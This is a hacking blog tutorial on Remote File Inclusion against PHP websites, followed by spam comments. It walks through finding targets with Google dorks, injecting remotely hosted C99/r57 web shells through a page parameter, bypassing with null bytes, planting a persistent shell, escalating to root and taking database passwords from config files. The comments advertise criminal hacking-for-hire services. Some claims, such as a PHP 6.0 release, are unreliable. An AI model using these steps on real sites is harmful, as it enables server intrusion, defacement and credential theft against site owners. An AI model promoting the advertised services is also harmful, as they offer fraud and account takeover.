Hello friends,Today i am going to explain and advanced method of hacking
websites that is How to hack websites using Remote File Inclusion. As the
name suggests Remote File Inclusion is technique where we inserts the file (in
hacking terminology called Shell) in to the Website and gets the admin rights.
Lets discuss this type of Website hacking technique in detail, so friends read
on...
What is Remote File Inclusion?
Remote File Inclusion is a method of hacking websites and getting the
admin rights of the server by inserting a remote file usually called as
SHELL (a shell is graphical user interface file which is used to browsing the
remote files and running your own code on the web servers) into a website,
whose inclusion allows the hackers to execute the server side commands as
a current user logged on, and have the access to all the server files. With
these rights we can continue to use local exploits to escalate our privileges
and get control over the whole server.
Note: Remote File Inclusion (RFI) is the best ever technique to hack
websites and more than 60% websites on the internet using PHP are
vulnerable to this attack.
Which Websites are Vulnerable to Remote File
Inclusion attack?
First and the very basic question arises in the mind of new hackers that How
we can find the websites that its prone to remote file inclusion attack. And
what are the basic vulnerabilities in the website that we will target to
hack any website and web server. Answer to these questions is quite simple.
Many of the web servers are vulnerable to this type of attack because of
PHP's default settings of register_globals and allow_url_fopen being
enabled.
Note: In the PHP 6.0, register_globals has been removed but still the
second vulnerability remains open, so we can give it a try to latest version
PHP websites too. But a good news for hackers is that around 90% websites
on the internet still uses old versions of PHP and another good news in those
90% websites, more than 60% websites has default settings enabled. That
means we can hack most of the websites and deface them. Isn't that cool,
but as i have said we are ethical hackers we only find vulnerabilities
FEATURED VIDEO ARCHIVES
SHARE
JOIN OUR HACKING GROUP
DOWNLOAD HACKER'S
TOOLBAR
Includes Uninstaller
System Requirements
Windows Vista/XP/2000
Other versions:
Internet Explorer
Includes Uninstaller
System Requirements
Windows Vista/XP/2000
Now lets start step by step Remote file inclusion method
to hack websites:
Step 1: Finding the Vulnerable Websites
First of all we have to find the website that gets his pages using the PHP
include() function and vulnerable to RFI (Remote File Inclusion). The
best technique is to find websites using Google Dorks. Google dorks are
simply the queries that are used to identify the specific search results.
Download the list of Dorks for RFI : Download
Step 2: Identifying Vulnerable website
Websites that have the page navigation sy stem similar to below mentioned:
| http://target-site.com/index.php?page=PageName
Step 3: Checking Website is Vulnerable or Not
To check if a the website is vulnerable to remote file inclusion attack, we
would try to include a website link instead of PageName as shown below:
|http://target-site.com/index.php?page=http://google.com
Step 4: Remote Inclusion of Shells
Now we know that website is hackable, so we will now include the shells into
the website. There are number of shells available online but my favorite are
C99 and r57 because of their extended functionality and features.
There is no need to download these shells on your sy stems or PC, we can
directly use the online resources for doing that but if you wish you can
download them from their respective websites. I will not provide these here
because its unethical but Google it and u can find them easily .
To find the a shell the hacker would search Google for:
|inurl:c99.txt
This will display many websites with the shell already up and ready to be
included.
Note: you must include a ? after the URL of Shell so that if any thing comes
after c99.txt, it will be passed to the shell and not cause any problems.
For future use of Analy sis you can download these shells from here:
Localroot
The new URL with the shell included would look like:
|http://target-site.com/index.php?page=http://site.com/c99.txt?
Step 5: Adding Null Byte
Sometimes the PHP script on the server appends “.php” to the end of every
included file. So if you included the shell, it would end up looking like
“c99.txt.php” and not work. To get around this, you would add a null by te ()
to the end of c99.txt. This tells the server to ignore every thing after c99.txt.
Step 6: Vulnerabilities Database
In step one, I told you that hackers use Google dorks to look for sites
possibly vulnerable to RFIs. An example of a Google dork would be:
allinurl:.php?page=
This looks for URL’s with .php?page= in them. This is only an example and
you most likely won’t find any vulnerable sites with that search. Y ou can
try switching around the word “page” with other letters and similar
words.
Hackers usually search vulnerability databases like
www.milw0rm.com for already discovered RFI vulnerabilities in site
content management sy stems and search for websites that are running that
vulnerable web application with a Google dork.
Step 6: If Attack Successful
If we succeeds in getting the server to parse the shell, then we will be see a
screen similar to the following:
The shell will display information about the remote server and list all the
files and directories on it. From here we would find a directory that has read
and write privileges and upload the shell but this time as a .php file so that
incase the vulnerability is fixed, he will be able to access it later on.
Step7: Find Root Privileges on Server
Now we would next find a way to gain root privileges on the sy stem. We can
do this by uploading and running local exploits against the server. you can
find list of such exploits on milw0rm. We could also search the victim server
for configuration files. These files most of the times contain username and
passwords for the MY SQL databases and such.
How to Protect your Websites and Forums from Remote
file inclusion attack?
As we are ethical hackers i will also explain for webmasters to protect their
websites from RFI attack.
To protect yourself from RFI attacks, simply make sure you are using up-todate scripts, and make sure you server php.ini file has register_globals and
allow_url_fopen disabled.
Note: Website hacking is illegal, this article is for Educational
purposes only.
Thanks for reading.. Enjoy..!!
need to hire an experienced hacker? visit www.hackerslist.co.uk or email donald.white@hackerslist.co.uk
ReplyDeleteAre you in need of an experienced hacker? Need access to various social networks? Look no further. We also offer the following services- change of grades, clearing of criminal records, blog and website hacking, clear credit card debts, smartphone hacks, DDOS and MITM attacks, pen testing and email account hacks. Contact us email/whatsapp cyberhack2010@outlook.com/+380636365483
ReplyDeleteYou won't be disappointed!